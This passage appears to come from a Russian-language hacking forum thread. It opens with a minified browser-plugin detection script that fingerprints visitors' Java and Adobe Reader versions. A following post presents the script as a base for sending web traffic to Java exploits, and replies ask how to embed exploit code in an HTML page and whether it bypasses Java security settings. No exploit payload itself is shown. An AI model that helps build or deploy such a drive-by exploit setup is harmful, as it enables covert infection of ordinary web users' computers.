d=this,e=d.$,a=d.navigator,c=1;if(!b||(!a.javaEnabled()&&!d.lang.System.getPropertyHas(b))||(!e.isIE&&!a.mimeObj&&!d.lang.System.getPropertyHas(b))||(e.isIE&&!e.ActiveXEnabled)){c=0}else{if(e.OS>=20){}else{if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2()){c=0}}}return c},setPluginStatus:function(d,i,g,h){var b=this,e=b.$,f,c=0,a=b.applet;g=g||b.version0;if(b.OTF>0){d=d||b.lang.System.getProperty()[0]}f=a.isRange(d);if(f){if(a.setRange(f,h)==d){c=f}d=0}if(b.OTF<3){b.installed=c?(c>0?0.7:-0.1):(d?1:(g?-0.2:-1))}if(b.OTF==2&&b.NOTF&&!b.applet.getResult()[0]&&!b.lang.System.getProperty()[0]){b.installed=g?-0.2:-1}if(b.OTF==3&&b.installed!=-0.5&&b.installed!=0.5){b.installed=(b.NOTF.isJavaActive(1)==1||b.lang.System.getProperty()[0])?0.5:-0.5}if(b.OTF==4&&(b.installed==-0.5||b.installed==0.5)){if(d){b.installed=1}else{if(c){b.installed=c>0?0.7:-0.1}else{if(b.NOTF.isJavaActive(1)==1){if(g){b.installed=1;d=g}else{b.installed=0}}else{if(g){b.installed=-0.2}else{b.installed=-1}}}}}if(g){b.version0=e.formatNum(e.getNum(g))}if(d&&!c){b.version=e.formatNum(e.getNum(d))}if(i&&e.isString(i)){b.vendor=i}if(!b.vendor){b.vendor=""}if(b.verify&&b.verify.isEnabled()){b.getVersionDone=0}else{if(b.getVersionDone!=1){if(b.OTF<2){b.getVersionDone=0}else{b.getVersionDone=b.applet.can_Insert_Query_Any()?0:1}}};e.codebase.emptyGarbage()},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],isDisabled:function(){var a=this,b=a.$;if(!b.DOM.isEnabled.objectTag()||(b.isIE&&b.verIE<6)||(b.isGecko&&b.compareNums(b.verGecko,b.formatNum("1.6"))<=0)||(b.isSafari&&b.OS==1&&(!b.verSafari||b.compareNums(b.verSafari,"5,1,0,0")<0))||b.isChrome){return 1}return 0},query:function(){var l=this,h=l.$,f=l.$$,k,m,i,a=h.DOM.altHTML,g={},b,d=null,j=null,c=(l.hasRun||l.isDisabled());l.hasRun=1;if(c){return l}l.status=0;if(h.isIE){for(m=0;m<l.classID.length;m++){l.HTML=h.DOM.insert("object",["classid",l.classID[m]],[],a);d=l.HTML.obj();if(h.getPROP(d,"jvms")){break}}}else{i=h.hasMimeType(l.mimeType);if(i&&i.type){l.HTML=h.DOM.insert("object",["type",i.type],[],a);d=l.HTML.obj()}}if(d){try{b=h.getPROP(d,"jvms");if(b){j=b.getLength();if(h.isNum(j)){l.status=j>0?1:-1;for(m=0;m<j;m++){i=h.getNum(b.get(j-1-m).version);if(i){l.VERSIONS.push(i);g["a"+h.formatNum(i)]=1}}}}}catch(k){}}i=0;for(m in g){i++}if(i&&i!==l.VERSIONS.length){l.VERSIONS=[]}if(l.VERSIONS.length){l.version=h.formatNum(l.VERSIONS[0])};return l}},navMime:{$:1,hasRun:0,mimetype:"",version:"",length:0,mimeObj:0,pluginObj:0,isDisabled:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},query:function(){var i=this,f=i.$,a=i.$$,b=(i.hasRun||i.isDisabled());i.hasRun=1;if(b){return i};var n=/^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,g,l,j,d="",h="a",o,m,k={},c=f.formatNum("0");for(l=0;l<navigator.mimeTypes.length;l++){o=navigator.mimeTypes[l];m=o?o.enabledPlugin:0;g=o&&n.test(o.type||d)?f.formatNum(f.getNum(RegExp.$1)):0;if(g&&m&&(m.description||m.name)){if(!k[h+g]){i.length++}k[h+g]=o.type;if(f.compareNums(g,c)>0){c=g}}}g=k[h+c];if(g){o=f.hasMimeType(g);i.mimeObj=o;i.pluginObj=o?o.enabledPlugin:0;i.mimetype=g;i.version=c};return i}},navPlugin:{$:1,hasRun:0,version:"",isDisabled:function(){var d=this,c=d.$,b=d.$$,a=b.navigator;if(c.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},query:function(){var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.isDisabled());m.hasRun=1;if(b){return m};a=h.pluginObj.name||"";i=h.pluginObj.description||"";if(!f||e.dbug){g=/Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;if((g.test(a)||g.test(i))&&parseInt(RegExp.$1,10)>=5){f="1,"+RegExp.$1+","+(RegExp.$2?RegExp.$2:"0")+","+(RegExp.$3?RegExp.$3:"0")}}if(!f||e.dbug){g=/Java[^\d]*Plug-in/i;l=g.test(i)?e.formatNum(e.getNum(i)):0;k=g.test(a)?e.formatNum(e.getNum(a)):0;if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0)){l=0}if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0)){k=0}d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);if(d){f=d}}if(!f&&e.isSafari&&e.OS==2){j=e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa",0);if(j){l=e.getNum(j.description);if(l){f=l}}};if(f){m.version=e.formatNum(f)};return m}},lang:{$:1,System:{$:1,hasRun:0,result:[null,null],isDisabled:function(){var b=this,c=b.$,a=b.$$;if(!window.java||c.isIE){return 1}if(c.OS==2&&c.verOpera&&c.verOpera<9.2&&c.verOpera>=9){return 1}return 0},getPropertyHas:function(a){var b=this,d=b.$,c=b.getProperty()[0];return(a&&c&&d.compareNums(d.formatNum(a),d.formatNum(c))===0)?1:0},getProperty:function(){var f=this,g=f.$,d=f.$$,h,a="java_qqq990",c,i="window.java.lang.System.getProperty",b=f.hasRun||f.isDisabled();f.hasRun=1;if(!b){g[a]=0;try{c=document.createElement("script");c.type="text/javascript";c.appendChild(document.createTextNode("(function(){var e;try{"+g.name+"."+a+"=["+i+"('java.version')+'',"+i+"('java.vendor')+'']}catch(e){}})();"));g.head.insertBefore(c,g.head.firstChild);g.head.removeChild(c)}catch(h){}if(g.isArray(g[a])){f.result=[].concat(g[a])}}return f.result}}},applet:{$:1,codebase:{$:1,isMin:function(a){return this.$.codebase.isMin(this,a)},search:function(){return this.$.codebase.search(this)},ParamTags:'<param name="code" value="A19999.class" /><param name="codebase_lookup" value="false" />',DIGITMAX:[[16,64],[6,0,512],0,[1,5,2,256],0,[1,4,1,1],[1,4,0,64],[1,3,2,32]],DIGITMIN:[1,0,0,0],Upper:["999","10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4"],Lower:["10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4","0"],convert:[function(b,a){return a?[parseInt(b[0],10)>1?"99":parseInt(b[1],10)+3+"",b[3],"0","0"]:["1",parseInt(b[0],10)-3+"","0",b[1]]},function(b,a){return a?[b[1],b[2],b[3]+"0","0"]:["1",b[0],b[1],b[2].substring(0,b[2].length-1||1)]},0,function(b,a){return a?[b[0],b[1],b[2],b[3]+"0"]:[b[0],b[1],b[2],b[3].substring(0,b[3].length-1||1)]},0,1,function(b,a){return a?[b[0],b[1],b[2],b[3]+"0"]:[b[0],b[1],b[2],b[3].substring(0,b[3].length-1||1)]},1]},results:[[null,null],[null,null],[null,null],[null,null]],getResult:function(){var b=this,d=b.results,a,c=[];for(a=d.length-1;a>=0;a--){c=d[a];if(c[0]){break}}c=[].concat(c);return c},DummySpanTagHTML:0,HTML:[0,0,0,0],active:[0,0,0,0],DummyObjTagHTML:0,DummyObjTagHTML2:0,allowed:[1,1,1,1],VerifyTagsHas:function(c){var d=this,b;for(b=0;b<d.allowed.length;b++){if(d.allowed===c){return 1}}return 0},saveAsVerifyTagsArray:function(c){var b=this,d=b.$,a;if(d.isArray(c)){for(a=1;a<b.allowed.length;a++){if(c.length>a-1&&d.isNum(c[a-1])){if(c[a-1]<0){c[a-1]=0}if(c[a-1]>3){c[a-1]=3}b.allowed[a]=c[a-1]}}b.allowed[0]=b.allowed[3]}},setVerifyTagsArray:function(d){var b=this,c=b.$,a=b.$$;if(a.getVersionDone===null){b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())}if(c.dbug||(a.verify&&a.verify.isEnabled())){b.saveAsVerifyTagsArray([3,3,3])}else{if(d){b.saveAsVerifyTagsArray(d)}}},isDisabled:{$:1,single:function(d){var a=this,c=a.$,b=a.$$;if(d==0){return c.codebase.isDisabled()}if((d==3&&!c.isIE)||a.all()){return 1}if(d==1||d==3){return !c.DOM.isEnabled.objectTag()}if(d==2){return a.AppletTag()}},aA_:null,all:function(){var c=this,e=c.$,d=c.$$,b=d.navigator,a=0;if(c.aA_===null){if(e.OS>=20){a=0}else{if(e.verOpera&&e.verOpera<11&&!b.javaEnabled()&&!d.lang.System.getProperty()[0]){a=1}else{if((e.verGecko&&e.compareNums(e.verGecko,e.formatNum("2"))<0)&&!b.mimeObj&&!d.lang.System.getProperty()[0]){a=1}else{if(c.AppletTag()&&!e.DOM.isEnabled.objectTag()){a=1}}}};c.aA_=a}return c.aA_},AppletTag:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;return d.isIE?!a.javaEnabled():0},VerifyTagsDefault_1:function(){var a=this.$;if(a.OS>=20){return 1}if((a.isIE&&(a.verIE<9||!a.ActiveXEnabled))||(a.verGecko&&a.compareNums(a.verGecko,a.formatNum("2"))<0)||(a.isSafari&&(!a.verSafari||a.compareNums(a.verSafari,a.formatNum("4"))<0))||(a.verOpera&&a.verOpera<10)){return 0}return 1},z:0},can_Insert_Query:function(d){var b=this,c=b.results[0][0],a=b.getResult()[0];if(b.HTML[d]||(d==0&&c!==null&&!b.isRange(c))||(d==0&&a&&!b.isRange(a))){return 0}return !b.isDisabled.single(d)},can_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.results.length;a++){if(b.can_Insert_Query(a)){return 1}}return 0},should_Insert_Query:function(e){var c=this,f=c.allowed,d=c.$,b=c.$$,a=c.getResult()[0];a=a&&(e>0||!c.isRange(a));if(!c.can_Insert_Query(e)||f[e]===0){return 0}if(f[e]==3||(f[e]==2.8&&!a)||(f[e]==2.5&&!b.lang.System.getProperty()[0])||(f[e]==2.2&&!b.lang.System.getProperty()[0]&&!a)){return 1}if(!b.nonAppletDetectionOk(b.version0)){if(f[e]==2||(f[e]==1&&!a)){return 1}}return 0},should_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.allowed.length;a++){if(b.should_Insert_Query(a)){return 1}}return 0},query:function(f){var j,a=this,i=a.$,d=a.$$,k=null,l=null,b=a.results,c,h,g=a.HTML[f];if(!g||!g.obj()||b[f][0]||d.bridgeDisabled||(i.dbug&&d.OTF<3)){return}c=g.obj(true);h=g.readyState();if(!i.isIE||h===4){try{k=i.getNum(c.getVersion()+"");l=c.getVendor()+"";c.statusbar(i.win.loaded?" ":" ")}catch(j){};if(k&&i.isStrNum(k)){b[f]=[k,l];a.active[f]=2}}},isRange:function(a){return(/^[<>]/).test(a||"")?(a.charAt(0)==">"?1:-1):0},setRange:function(b,a){return(b?(b>0?">":"<"):"")+(this.$.isString(a)?a:"")},insert_Query_Any:function(n){var e=this,c=e.$,k=e.$$,l=e.results,m=e.HTML,g=c.DOM.altHTML,r="A.class",o,b=c.file.getValid(k);if(e.should_Insert_Query(0)){if(k.OTF<2){k.OTF=2};l[0]=[0,0];o=n?e.codebase.isMin(n):e.codebase.search();if(o){l[0][0]=n?e.setRange(o,n):o}e.active[0]=o?1.5:-1}if(!b){return e.getResult()}var f=b.name+b.ext,q=b.path;var i=["archive",f,"code",r],j=["mayscript","true"],p=["scriptable","true","codebase_lookup","false"].concat(j),a=k.navigator,d=!c.isIE&&a.mimeObj&&a.mimeObj.type?a.mimeObj.type:k.mimeType[0];if(!e.DummySpanTagHTML){e.DummySpanTagHTML=c.DOM.insert("",[],[],g)}if(e.should_Insert_Query(1)){if(k.OTF<2){k.OTF=2};m[1]=c.isIE?c.DOM.insert("object",["type",d],["codebase",q].concat(i).concat(p),g,k):c.DOM.insert("object",["type",d],["codebase",q].concat(i).concat(p),g,k);l[1]=[0,0];e.query(1)}if(e.should_Insert_Query(2)){if(k.OTF<2){k.OTF=2};m[2]=c.isIE?c.DOM.insert("applet",["alt",g].concat(j).concat(i),["codebase",q].concat(p),g,k):c.DOM.insert("applet",["codebase",q,"alt",g].concat(j).concat(i),[].concat(p),g,k);l[2]=[0,0];e.query(2)}if(e.should_Insert_Query(3)){if(k.OTF<2){k.OTF=2};m[3]=c.isIE?c.DOM.insert("object",["classid",k.classID],["codebase",q].concat(i).concat(p),g,k):c.DOM.insert();l[3]=[0,0];e.query(3)}if(c.DOM.isEnabled.objectTag()){if(!e.DummyObjTagHTML&&(m[1]||m[2])){e.DummyObjTagHTML=c.DOM.insert("object",["type",k.mimeType_dummy],[],g)}if(!e.DummyObjTagHTML2&&m[3]){e.DummyObjTagHTML2=c.DOM.insert("object",["classid",k.classID_dummy],[],g)}}var h=k.NOTF;if(k.OTF<3&&h.shouldContinueQuery()){k.OTF=3;h.onIntervalQuery=c.handler(h.$$onIntervalQuery,h);if(!c.win.loaded){c.win.funcs0.push([h.winOnLoadQuery,h])}setTimeout(h.onIntervalQuery,h.intervalLength)}return e.getResult()}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function(){var f=this,e=f.$,c=f.$$,b=c.applet,a,d=0;if(e.win.loaded&&f.count>f.countMax){return 0}for(a=0;a<b.results.length;a++){if(b.HTML[a]){if(!e.win.loaded&&f.count>f.countMax&&e.codebase.checkGarbage(b.HTML[a].span)){d=1;b.HTML[a].DELETE=1}if(!d&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&f.isAppletActive(a)>=0){return 1}}};return 0},isJavaActive:function(d){var f=this,c=f.$$,a,b,e=-9;for(a=0;a<c.applet.HTML.length;a++){b=f.isAppletActive(a,d);if(b>e){e=b}}return e},isAppletActive:function(e,g){var h=this,f=h.$,b=h.$$,l=b.navigator,a=b.applet,i=a.HTML[e],d=a.active,k,c=0,j,m=d[e];if(g||m>=1.5||!i||!i.span){return m};j=f.DOM.getTagStatus(i,a.DummySpanTagHTML,a.DummyObjTagHTML,a.DummyObjTagHTML2,h.count);for(k=0;k<d.length;k++){if(d[k]>0){c=1}}if(j!=1){m=j}else{if(f.isIE||((b.version0&&l.javaEnabled()&&l.mimeObj&&(i.tagName=="object"||c))||b.lang.System.getProperty()[0])){m=1}else{m=0}}d[e]=m;return m},winOnLoadQuery:function(c,d){var b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();d.queryCompleted(a)}},$$onIntervalQuery:function(d){var c=d.$,b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();if(!d.shouldContinueQuery()){d.queryCompleted(a)}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},queryAllApplets:function(){var f=this,e=f.$,d=f.$$,c=d.applet,b,a;for(b=0;b<c.results.length;b++){c.query(b)}a=c.getResult();return a},queryCompleted:function(c){var g=this,f=g.$,e=g.$$,d=e.applet,b;if(e.OTF>=4){return}e.OTF=4;var a=g.isJavaActive();for(b=0;b<d.HTML.length;b++){if(d.HTML&&d.HTML.DELETE){f.DOM.emptyNode(d.HTML.span);d.HTML.span=null}}e.setPluginStatus(c[0],c[1],0);if(e.funcs){f.callArray(e.funcs)}if(f.DOM){f.DOM.onDoneEmptyDiv()}}},zz:0},adobereader:{$:1,setPluginStatus:function(){var d=this,b=d.$,a=d.navPlugin.detected,e=d.navPlugin.version,g=d.axo.detected,c=d.axo.version,i=d.doc.detected,h=d.doc.version,f=e||c||h||null;d.installed=f?1:(a>0||g>0||i>0?0:(i==-0.5?-0.15:(b.isIE&&(!b.ActiveXEnabled||b.ActiveXFilteringEnabled)?-1.5:-1)));d.version=b.formatNum(f)},getVersion:function(c,e){var a=this,d=a.$,b=0;if((!b||d.dbug)&&a.navPlugin.query().detected>0){b=1}if((!b||d.dbug)&&a.axo.query().detected>0){b=1}if((!b||d.dbug)&&(a.doc.query().detected>0||a.doc.detected==-0.5)){b=1}a.setPluginStatus()},navPlugin:{$:1,detected:0,version:null,mimeType:"application/pdf",isDisabled:function(){var c=this,b=c.$,a=c.$$;return b.isIE||c.detected||!b.hasMimeType(c.mimeType)?1:0},attempt3:function(){var c=this,b=c.$,a=null;if(b.OS==1){if(b.hasMimeType("application/vnd.adobe.pdfxml")){a="9"}else{if(b.hasMimeType("application/vnd.adobe.x-mars")){a="8"}else{if(b.hasMimeType("application/vnd.adobe.xfdf")){a="6"}}}}return a},query:function(){var d=this,c=d.$,a=d.$$,f,e,b=null;if(d.isDisabled()){return d};f="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";e=c.findNavPlugin(f,0);d.detected=e?1:-1;if(e){b=c.getNum(e.description)||c.getNum(e.name);b=c.getPluginFileVersion(e,b);if(!b){b=d.attempt3()}}if(b){d.version=b};return d}},pluginQuery:function(j){var f=this,d=f.$,b="",h=null,g,a,i,c;try{if(j){b=j.GetVersions()}}catch(g){}if(b&&d.isString(b)){a=/=\s*([\d\.]+)/g;for(i=0;i<30;i++){if(a.test(b)){c=d.formatNum(RegExp.$1);if(!h||d.compareNums(c>h)>0){h=c}}else{break}}}return h},axo:{$:1,detected:0,version:null,progID:["AcroPDF.PDF","AcroPDF.PDF.1","PDF.PdfCtrl","PDF.PdfCtrl.5","PDF.PdfCtrl.1"],isDisabled:function(){var b=this,c=b.$,a=b.$$;return c.isIE&&!b.detected?0:1},query:function(){var d=this,e=d.$,b=d.$$,f=0,c=null,a;if(d.isDisabled()){return d};for(a=0;a<d.progID.length;a++){f=e.getAXO(d.progID[a]);if(f){d.detected=1;c=b.pluginQuery(f);if(!e.dbug&&c){break}}}d.version=c?c:null;if(d.detected===0){d.detected=-1};return d}},doc:{$:1,detected:0,version:null,classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",classID_dummy:"clsid:CA8A9780-280D-11CF-A24D-BA9876543210",DummySpanTagHTML:0,HTML:0,DummyObjTagHTML1:0,DummyObjTagHTML2:0,isDisabled:function(){var c=this,b=c.$,a=0;if(c.detected){a=1}else{if(b.dbug){}else{if(!b.isIE||!b.DOM.isEnabled.objectTag()){a=1}}}return a},query:function(){var i=this,d=i.$,f=i.$$,h=null,a=d.DOM.altHTML,g=null,c=1,e=1,b;if(i.isDisabled()){return i};if(!i.DummySpanTagHTML){i.DummySpanTagHTML=d.DOM.insert("",[],[],a,f,e)}if(!i.HTML){i.HTML=d.DOM.insert("object",["classid",i.classID],[],a,f,e)}if(!i.DummyObjTagHTML2){i.DummyObjTagHTML2=d.DOM.insert("object",["classid",i.classID_dummy],[],a,f,e)}b=d.DOM.getTagStatus(i.HTML,i.DummySpanTagHTML,i.DummyObjTagHTML1,i.DummyObjTagHTML2,g,c);h=f.pluginQuery(i.HTML.obj());i.detected=b>0||h?1:(b==-0.1||b==-0.5?-0.5:-1);i.version=h?h:null;return i}}},zz:0}};PluginDetect.INIT();

    Вот теперь мы можем лить трафф не боясь лишних санкций теперь когда у вас есть код вы можете добавить список java эксплоитов.
     
  5. NANOTECH

    NANOTECH

    Регистрация:
    11 дек 2012
    Сообщения:
    150
    Симпатии:
    69
    в 1.html код из первого поста должен быть вставлен?
     
    • Like Like x 1
  6. 1337day

    1337day

    Регистрация:
    16 ноя 2013
    Сообщения:
    1
    Симпатии:
    0
    как поставить Java кода эксплойта в HTML
     
  7. zakkk

    zakkk

    Регистрация:
    15 май 2013
    Сообщения:
    226
    Симпатии:
    88
    Настройки безопасности явы должны быть не выше средних в старой версии чтобы это запустилось ? Или эксплойт это и обходит ?

    Второй пост , как я понял это проверка сработает ли эксплойт на каком-то компе . Подскажи пожалуйста ( если не влом) что в 1.хтмл ? Как его запустить ?
     

Поделиться этой страницей

Загрузка...